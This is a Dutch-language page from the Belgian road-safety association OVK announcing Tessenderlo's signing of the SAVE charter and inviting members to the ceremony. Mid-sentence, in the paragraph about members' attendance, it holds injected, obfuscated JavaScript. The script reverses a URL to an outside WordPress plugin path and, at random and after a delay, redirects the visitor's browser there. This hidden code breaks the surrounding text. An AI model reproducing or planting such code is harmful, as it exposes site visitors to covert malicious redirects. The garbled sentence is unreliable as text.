Met het SAVE-Charter Steden & Gemeenten wil de vzw Ouders van Verongelukte Kinderen (OVK) de Belgische steden en gemeenten betrekken bij haar strijd tegen de (nog steeds) te grote verkeersonveiligheid in ons land.

Op deze website vindt u meer informatie over het SAVE-charter. Daarnaast is er ook verdere informatie terug te vinden over OVK en haar werking.

Tessenderlo neemt deel aan het project “SAVE-charter Steden & Gemeenten”

Op maandag 17 juni zal het gemeentebestuur van Tessendelor het SAVE-charter Steden & Gemeenten officieel ondertekenen en hiermee het engagement aangaan om een actieplan verkeersveiligheid op te maken, in samenwerking met OVK.

U wordt vriendelijk uitgenodigd deze ondertekening bij te wonen op maandag 17 juni om 18 uur in de raadzaal van het gemeentehuis van Tessenderlo (tweede verdieping), Markt 19. Dit geeft u de gelegenheid kennis te maken met deze nieuwe actie van de vereniging. Aansluitend wordt door het gemeentebestuur een drankje aangeboden.

De aanwezigheid van OVK-leden op een ondertekening moedigt het gemeentebestuur extra aan om het project toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot een goed einde te brengen.

Tessenderlo wordt zo de 19de Vlaamse gemeente die deelneemt aan het project van OVK.


© 2012 O.V.K. vzw - Léon Theodorstraat 85, 1090 Brussel - Tel: 02/427.75.00 - info@ovk.be